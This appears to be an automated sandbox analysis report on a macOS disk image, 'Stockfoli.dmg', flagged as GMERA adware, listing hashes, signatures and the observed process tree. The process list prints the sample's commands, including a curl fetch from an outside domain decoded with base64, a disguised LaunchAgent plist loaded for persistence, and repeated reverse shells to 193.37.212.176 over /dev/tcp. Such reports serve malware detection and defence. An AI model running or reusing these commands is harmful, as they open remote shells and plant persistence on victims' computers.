gmera | 118ba3642fdff254e37aee1ff9552fe189f7b1f8d5302d51c5010335acce6c2c

Analysis

max time network
159s
platform
macos_amd64
resource
macos
submitted
24-06-2021 12:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Stockfoli.dmg
Size

11.2MB
MD5

22a526c0658e542f24358178fb079c38
SHA1

352985598e83b42e99dfcb19636227335a18f8c0
SHA256

118ba3642fdff254e37aee1ff9552fe189f7b1f8d5302d51c5010335acce6c2c
SHA512

73c37880c044235028708e81d840120e78951a5ab4c100338ee958bce2409890a3c9dee75eab95dd8e37e98bd73c4561ff7a3413669527fa5ef458cce26971af

Score

10^/10

gmera adware

Malware Config

Signatures

GMERA
GMERA family.
adware gmera
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

28 ipecho.net

flow	ioc
28	ipecho.net

/bin/sh
sh -c "sudo open /Volumes/Stockfoli/Stockfoli.app"
1⤵
PID:539

/bin/bash
sh -c "sudo open /Volumes/Stockfoli/Stockfoli.app"
1⤵
PID:539

/usr/bin/sudo
sudo open /Volumes/Stockfoli/Stockfoli.app
1⤵
PID:539

/usr/bin/open
open /Volumes/Stockfoli/Stockfoli.app
2⤵
PID:540

/Volumes/Stockfoli/Stockfoli.app/Contents/MacOS/Stockfoli
/Volumes/Stockfoli/Stockfoli.app/Contents/MacOS/Stockfoli
1⤵
PID:541

/bin/bash
/bin/bash -c "nohup sh '/Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh' </dev/null >/dev/null 2>&1 &"
1⤵
PID:550

/usr/bin/nohup
nohup sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh
2⤵
PID:551

/usr/bin/sh
sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh
2⤵
PID:551

/bin/sh
sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh
2⤵
PID:551

/bin/bash
sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh
2⤵
PID:551

/usr/bin/curl
curl -ks "http://owpqkszz.info/link.php?run&185.220.101.144"
3⤵
PID:573

/usr/bin/base64
base64 --decode
3⤵
PID:575

/bin/cat
cat /tmp/.com.apple.upd.plist
3⤵
PID:576

/bin/cp
cp /tmp/.com.apple.upd.plist /Users/run/Library/LaunchAgents/.com.apple.upd.plist
3⤵
PID:577

/bin/cat
cat /Users/run/Library/LaunchAgents/.com.apple.upd.plist
3⤵
PID:578

/bin/launchctl
launchctl load /tmp/.com.apple.upd.plist
3⤵
PID:579

/usr/bin/screen
screen -d -m bash -c "bash -i >/dev/tcp/193.37.212.176/25733 0>&1"
3⤵
PID:584

/usr/bin/whoami
whoami
1⤵
PID:554

/usr/bin/tr
tr -dc "[:alnum:].\\r"
1⤵
PID:556

/usr/bin/tr
tr "[:upper:]" "[:lower:]"
1⤵
PID:557

/usr/bin/curl
curl -s ipecho.net/plain
1⤵
PID:560

/bin/bash
/bin/bash -c "nohup '/Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio' </dev/null >/dev/null 2>&1 &"
1⤵
PID:561

/usr/bin/nohup
nohup /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio
2⤵
PID:562

/Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio
/Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio
2⤵
PID:562

/bin/bash
/bin/bash -c "screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25734 0>&1'"
1⤵
PID:563

/usr/bin/screen
screen -d -m bash -c "bash -i >/dev/tcp/193.37.212.176/25734 0>&1"
1⤵
PID:563

/usr/bin/login
login -pflq run /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25734 0>&1"
1⤵
PID:565

/bin/bash
bash -c "bash -i >/dev/tcp/193.37.212.176/25734 0>&1"
2⤵
PID:568

/bin/bash
bash -i
3⤵
PID:569

/bin/bash
/bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25735 0>&1"
1⤵
PID:566

/bin/bash
bash -i
2⤵
PID:567

/usr/bin/tr
tr -dc "[:alnum:].\\r"
1⤵
PID:571

/usr/bin/tr
tr "[:upper:]" "[:lower:]"
1⤵
PID:572

/bin/launchctl
launchctl list
1⤵
PID:582

/usr/bin/grep
grep upd
1⤵
PID:583

/usr/bin/login
login -pflq run /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25733 0>&1"
1⤵
PID:589

/bin/bash
bash -c "bash -i >/dev/tcp/193.37.212.176/25733 0>&1"
2⤵
PID:591

/bin/bash
bash -i
3⤵
PID:592

/bin/bash
/bin/bash -c "screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25736 0>&1'"
1⤵
PID:615

/usr/bin/screen
screen -d -m bash -c "bash -i >/dev/tcp/193.37.212.176/25736 0>&1"
1⤵
PID:615

/usr/bin/login
login -pflq run /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25736 0>&1"
1⤵
PID:617

/bin/bash
bash -c "bash -i >/dev/tcp/193.37.212.176/25736 0>&1"
2⤵
PID:618

/bin/bash
bash -i
3⤵
PID:619

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

/Users/run/Library/LaunchAgents/.com.apple.upd.plist
MD5
d1ec6e05e4d46e06768d1e57bbe4a0e1

SHA1
ee6e20dcf2682bdf84d0614287c8053cc71fd744

SHA256
be8b6549da925f285307b17c616a010a9418af70d090ed960ade575ce27c7787

SHA512
a8903122038bd063d6094a234167e008840dfbdee4d16342c534c623d5642ab9a6a3ebf7138f462909d32ea2c01c3ea7c045ba6aa9e06a551b4a0754c3f2742b

Download Submit
/Users/run/Library/LaunchAgents/.com.apple.upd.plist
MD5
d1ec6e05e4d46e06768d1e57bbe4a0e1

SHA1
ee6e20dcf2682bdf84d0614287c8053cc71fd744

SHA256
be8b6549da925f285307b17c616a010a9418af70d090ed960ade575ce27c7787

SHA512
a8903122038bd063d6094a234167e008840dfbdee4d16342c534c623d5642ab9a6a3ebf7138f462909d32ea2c01c3ea7c045ba6aa9e06a551b4a0754c3f2742b

Download Submit
/private/tmp/.com.apple.upd.plist
MD5
d1ec6e05e4d46e06768d1e57bbe4a0e1

SHA1
ee6e20dcf2682bdf84d0614287c8053cc71fd744

SHA256
be8b6549da925f285307b17c616a010a9418af70d090ed960ade575ce27c7787

SHA512
a8903122038bd063d6094a234167e008840dfbdee4d16342c534c623d5642ab9a6a3ebf7138f462909d32ea2c01c3ea7c045ba6aa9e06a551b4a0754c3f2742b

Download Submit
/private/tmp/.com.apple.upd.plist
MD5
d1ec6e05e4d46e06768d1e57bbe4a0e1

SHA1
ee6e20dcf2682bdf84d0614287c8053cc71fd744

SHA256
be8b6549da925f285307b17c616a010a9418af70d090ed960ade575ce27c7787

SHA512
a8903122038bd063d6094a234167e008840dfbdee4d16342c534c623d5642ab9a6a3ebf7138f462909d32ea2c01c3ea7c045ba6aa9e06a551b4a0754c3f2742b

Download Submit
/private/tmp/loglog
MD5
ebb0a7faa9956546a1e4992db15c1f89

SHA1
9abe892e93d3605337dc84ba8f7573899b0585e5

SHA256
411eb63035d57f9bb853e0327a91f2ad6ae556acd188080a30c45554f4f3b402

SHA512
7303bf0471741cf275f0549903b8d6bd63df61ff9e83724ba15ca5f35f0902ac92e9d1b5e485bc29a765d58309b146a12af77eb9f66e4b1a5d729a58fc4db1eb

Download Submit
/private/tmp/loglog
MD5
1a2c1acc6fc4f2300a663be1f037a8d3

SHA1
ea7570da86c520cfde9ca1ae37c3a538948ad324

SHA256
f9ae2bfd1327a91fd3702a2ea67cb268a26828f67c40bd440e95df83412566ab

SHA512
d698402262f96f375641b1d4d3e8decb1b62b71b3c93484c9a50c1f25d637408fc0a5a23a79eb44cf1674a493ebf0f5a827079ab48a615e41994b84fbbeffd1d

Download Submit
/private/tmp/loglog
MD5
3f7e6c6f205752cb986504166b1b3037

SHA1
d3e6925bf8f0da26725effa98caf7d54876111fb

SHA256
bb635b4827e77b2037a16333da358af85ff62905a44b27b8cee63b67a1b26259

SHA512
73d59adba3fcd4f60cb92aa53d1d4b2978a319bf90663aeb99652900b1bae62b473d54d91601cc1d1b976503b9b20018616c9b727232581a68a41daa4d2d55fd

Download Submit
/private/tmp/loglog
MD5
f4ebc88a7d81289168033c588c03c2a5

SHA1
dd3f91fb830a70c6f1cc1f41cd25d1ad2e9470dc

SHA256
16cf58feb19a0877dc7e248042012d40cb036df8638ec29da7defe5457c64459

SHA512
f5e709b27ecd7f48e9b54710ae93313e3587f9fe8c8eef3a9ea2e1f63e9cb2c69820734bcd418a572996d823b173e79739b20c37bbf998fd0d5243b180ab95c9

Download Submit
/private/tmp/loglog
MD5
c17888dc849760d8b3a0f9a9e7bf2d77

SHA1
9dde4a42c8a59a5f1798dceb6e09c8e61094b504

SHA256
d1dd27a95370338a0e79c7c25189d551a0c2c1a4bb25f7bad99e38406c8a72f1

SHA512
7432f19f04728afb2dd192ce00fce477bda2a1687feee8be9299d66b7cd58023837dafa06d45dd9598ff63ccd8bb275e7539d89e6fb3ddf7cd69dbec9abf9143

Download Submit
/private/tmp/loglog
MD5
42736086060db6e7fc1f3a69eded83db

SHA1
3d6e08dbb4a92335369e2a40f1586a8154db7233

SHA256
50e9da2d41889df1f86dd9fef667c4ff836e9b640789817ee813b6b7a6ed7e4a

SHA512
c69b8e40ef6d806a23ca6d8bb94aa033f19f710e48761bf7ce1e1f5a729c5c495358b09a4bbf802c1040304acec9b899d83f79ecc12e9ef019b0e2ce5259c129

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads